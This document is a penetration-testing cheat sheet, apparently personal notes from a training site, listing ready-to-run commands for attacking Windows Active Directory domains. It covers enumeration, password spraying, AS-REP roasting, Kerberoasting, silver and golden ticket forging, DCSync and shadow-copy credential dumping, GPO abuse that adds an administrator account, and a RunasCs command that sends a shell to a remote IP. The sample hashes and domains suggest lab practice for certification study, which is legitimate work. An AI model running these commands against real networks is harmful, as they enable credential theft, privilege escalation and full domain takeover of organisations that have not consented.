Active Directory

Enumeration

Manual Enumeration

# Display users in the domain
net user /domain
# Display info about the user jeffadmin
net user jeffadmin /domain
# Display groups in the domain
net group /domain
# Display members in specific group
net group "IT Department" /domain
# Display PDC of a domain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

## Enumeration with PowerView
Import-Module .\PowerView.ps1
# Get info about Domain, Users and grouprs
Get-NetDomain ; Get-NetUser ; Get-NetGroup
# Domain computer overview
Get-NetComputer | select operatingsystem,dnshostname
# Scanning domain to find local administrative privileges for our user
Find-LocalAdminAccess
# Checking logged on users on client74
Get-NetSession -ComputerName client74 -Verbose
.\PsLoggedon.exe \\client74

## Enumeration Through SPN
# Listing the SPN accounts in the domain
Get-NetUser -SPN | select samaccountname,serviceprincipalname
# Listing SPN linked to iis_service user account
setspn -L iis_service

## Enumerating Object Permissions
# AD ACE permission types
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE applied to object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to for example a group
# Enumerating ACLs for the Management Group (ObjectSID,ActiveDirectoryRights,SecurityIdentifier)
Get-ObjectAcl -Identity "Management Department" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
# Converting the SecurityIdentifier into name
"S-1-5-21-1987370270-658905905-1781884369-512" | Convert-SidToName

## Enumerating Domain Shares
# List Domain Shares. add -CheckShareAccess if you want only ones accessible to us
Find-DomainShare

Automated Enumeration

# SharpHound
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\sharepond -OutputPrefix "corp"
bloodhound-python -u user -p password -ns 10.10.1.5 -d offsec.lab -c all
# BloodHound
sudo neo4j start # neo4j:neo4j
bloodhound
# Custom queries
MATCH (m:Computer) RETURN m        # Display all computers
MATCH (m:User) RETURN m            # Display all users
MATCH (m:GPO) RETURN m             # Display GPO
MATCH (m:Group) RETURN m           # Display Group
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p    # Display all active sessions

# adPEAS
Invoke-adPEAS -Domain 'NeoSoft.local' -Cred $Cred
# ADRecon
.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>
# Invoke-ADEnum
# PingCastle

runas.exe /netonly /user:<domain>\<username> cmd.exe
.\RunasCs.exe administrator P@ssword123 cmd.exe -r 192.168.45.161:80

AD Attacks

Password Attacks

# Usernames Bruteforce
kerbrute userenum --dc 192.168.147.97 -d corp.com -o kerbrute-userenum xato-net-10-million-usernames.txt

# Password spraying on windows and linux
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin # (No accounts should be locked out)
Invoke-DomainPasswordSpray -UserList usernames.txt -Domain corp.com -PasswordList passlist.txt -OutFile creds.txt
.\kerbrute passwordspray -d corp.com .\usernames.txt "Nexus123!"
crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success

AS-REP Roasting

# AS-REP Roasting : AD user account with option Do not require Kerberos preauthentication enabled
impacket-GetNPUsers -dc-ip 192.168.0.9 -request -outputfile hashes.asreproast corp.com/pete:'P@ssw0rd'
.\Rubeus.exe asreproast /nowrap
hashcat -m 18200 hashes.asreproast rockyou.txt -r best64.rule --force
# only list user accounts
impacket-GetNPUsers -dc-ip 192.168.0.9 corp.com/pete
Get-DomainUser -PreauthNotRequired
# If we have GenericWrite or GenericAll permissions on another AD user we could modify UAC of the user to not require Kerberos preauthentication
Invoke-ACLScanner -ResolveGUIDS | where {$_.ActiveDirectoryRights -eq 'GenericAll'}

Kerberoasting

# Kerberoasting : Decrypt TGS-REP to obtain cleartext password of the service account
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
impacket-GetUserSPNs -request -dc-ip 192.168.171.70 corp.com/pete:'P@ssw0rd'
hashcat -m 13100 hashes.kerberoast rockyou.txt -r best64.rule --force
# If we have GenericWrite or GenericAll permissions on another AD user we could set an SPN for the user, kerberoast the account, and crack the password hash
ntpdate <dc_ip> # sync local time with server if error

Silver Tickets

# Silver Ticket : Forges a TGS ticket for a specific service with the use of the service account password or NTLM hash. We need : SPN password hash, Domain SID, Target SPN
# 1. SPN password hash : sekurlsa::logonpasswords
# 2. SPN : Get-ADUser -Filter {SamAccountName -eq "svc_mssql"} -Properties ServicePrincipalNames
# 3. Domain SID : we need to omit the 4 last digit => whoami /user OR Get-ADdomain
# 4. nthash : codebeautify.org/ntlm-hash-generator
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator
impacket-mssqlclient -k nagoya.nagoya-industries.com    # Auth with TGS
# https://medium.com/@0xrave/nagoya-proving-grounds-practice-walkthrough-active-directory-bef41999b46f

# Import TGS in Linux
export KRB5CCNAME=$PWD/Administrator.ccache
klist
# create the file /etc/krb5user.conf
[libdefaults]
        default_realm = NAGOYA-INDUSTRIES.COM
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
        fcc-mit-ticketflags = true

[realms]        
        NAGOYA-INDUSTRIES.COM = {
                kdc = nagoya.nagoya-industries.com
        }

[domain_realm]
        .nagoya-industries.com = NAGOYA-INDUSTRIES.COM

DCSync Attack

# Impersonates a DC to request replication of user credentials. Domain Admins, Enterprise Admins, Administrators groups have the right by default to do so
lsadump::dcsync /user:corp\dave
impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"P@ssw0rd"@192.168.50.70

GPO

# If we have acces to a GPO (GenericAll,GenericWrite,WriteProperty). www.thehacker.recipes/ad/movement/group-policies
# List GPO : Get-GPO -all        # update GPO : gpupdate
python3 pygpoabuse.py 'corp.com/user:pass' -gpo-id '469...D81' -command 'net user gpoabuse Password123! /add && net localgroup administrators gpoabuse /add' -v

Active Directory Persistence

Golden Ticket

# Golden Ticket : create TGTs with the use of krbtgt password hash
# We need Domain Admin's group account or access to DC 
lsadump::lsa /patch    # Dumping the krbtgt password hash from DC.

# From a compromised machine or our attack machine
kerberos::purge    # Delete any existing Kerberos tickets
# Creating a golden ticket. SID can be extracted with (whoami /user)
kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
PsExec.exe \\dc1 cmd.exe # Execute cmd on DC, using hostname instead of IP to use kerberos auth

Shadow Copies

# Shadow Copy of the entire C: drive using cmd.exe. Can be used to extract hashes and kerberos keys of all AD users
vshadow.exe -nw -p  C:    # keep note of Shadow copy device name
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak
# In our attack box
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

PreviousWindows NextAD Tools

Last updated 1 month ago